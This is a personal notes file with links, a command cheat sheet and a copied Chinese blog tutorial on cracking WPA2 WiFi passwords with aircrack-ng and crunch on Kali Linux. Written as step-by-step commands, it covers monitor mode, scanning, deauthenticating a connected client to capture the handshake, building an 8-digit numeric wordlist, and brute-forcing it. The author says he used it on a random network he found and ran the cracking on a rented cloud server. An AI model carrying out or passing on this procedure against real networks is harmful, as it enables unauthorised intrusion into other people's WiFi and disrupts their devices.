{
https://github.com/conwnet/wpa-dictionary
http://www.360doc.com/content/18/0827/09/52701931_781512408.shtml
https://www.cnblogs.com/a986771570/p/6210925.html
}
{
//build password
//abcdefghijklmnopqrstuvwxyz0123456789
crunch 10 10 0123 -o ./password.txt
sudo su
airmon-ng start
//wlan0mon or other
//listen
airodump-ng wlan0mon
//open terminal
//ch + mac
sudo su
airodump-ng -c ch --bssid mac wlan0mon
aireplay-ng -0 2 -a mac -c mac wlan0mon
aircrack-ng -w password.txt *.cap
}
{
操作环境:kali
使用工具:aircrack-ng,crunch
在家里闲来无事,便研究了一下怎么破解wifi密码,也算有点成就感.本文章争取通俗笼统,尽量保证让新手也能看懂,当然完全没Linux基础还是先去坐着吧。
不要对其中的命令死记硬背,先要把原理和步骤搞清楚
开始:
1.打开WIFI,但是要断开wifi连接,防止后面出现错误
2.airmon-ng 查看支持监控(moniter)的网卡,我的是wlan0,每个人可能会不同,按你的实际名称来(图1)

3.airmon-ng start wlan0 开启该网卡监控模式(moniter),网卡名称变为wlan0mon,之后写网卡名称时不要错写成wlan0!我用airmon-ng命令重新确认了一下(图2)

4.airodump-ng wlan0mon 使用该网卡开始扫描,显示一大批wifi热点,都是WPA2 加密模式,差不多选择完目标后可选择Ctrl+c停止扫描(图3)

5.airodump --bssid 该wifi的bssid --channel 该wifi的信道 --write 把捕获的包放到哪里 wlan0mon (图4)
例如我选择第一个xiaomi则输入
airodump --bssid 34:80:B3:3C:FD:49 --channel 6 --write xiaomi wlan0mon (建议先创建一个目录,在该目录下运行此命令)

6.发现连接该wifi的有一台设备,我们需要获取该wifi的用户认证包,你可以一直等他下次重新上线,当然我们没那么有耐心,于是就有了下一个命令aireplay-ng(图4)
7.aireplay-ng -0 3 -a 该wifi的bssid -c 连接该wifi的用户设备station wlan0mon (图5右侧)
(-0表示发送解除认证,让该设备重新连接以获取认证包,3表示发送3次,当该数为0时表示无限次,-a表示access point,-c表示client)

运行该命令后图5左边窗口出现 【WPA handshake:......】说明抓到了认证包,可以与图4对比一下。完成之后记得用 airmon-ng stop wlan0mon 关闭网卡监听模式!
8.此步骤为额外步骤,可不进行。
我用wireshark打开捕获的包xiao.cap,点Protoco进行分类,确实发现了认证包

9.有了认证包之后,我们破解还需要字典,一般人密码会用八位数字组成,于是我用crunch创建8位纯数字组成的字典,有837MB大小,对crunch工具不了解的自行百度
crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o wordlist.txt
调用密码库文件 charset.lst, 生成最小为8,最大为8,元素为密码库 charset.lst中 numeric的项目,并保存为 wordlist.txt;其中 charset.lst在kali_linux的目录 为 /usr/share/crunch/charset.lst, -o:用于指定输出字典文件的位置。
>想了解更多可以vim /usr/share/crunch/charset.lst 查看所有密码库

10.aircrack-ng 捕获的.cap包 -w 密码字典

11.额外步骤,可不进行。
因为是自己随便找的wifi,所以用暴力破解看运气,很耗时间,所以我干脆把他放到租的云服务器里让他自个去运行,反正现在云服务器很便宜,用上screen命令让其在用户退出登陆时继续运行(不了解screen工具的自行百度,一个很好用的工具)

作者:颜科鸣_5482
链接:https://www.jianshu.com/p/893cc1224d34
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
}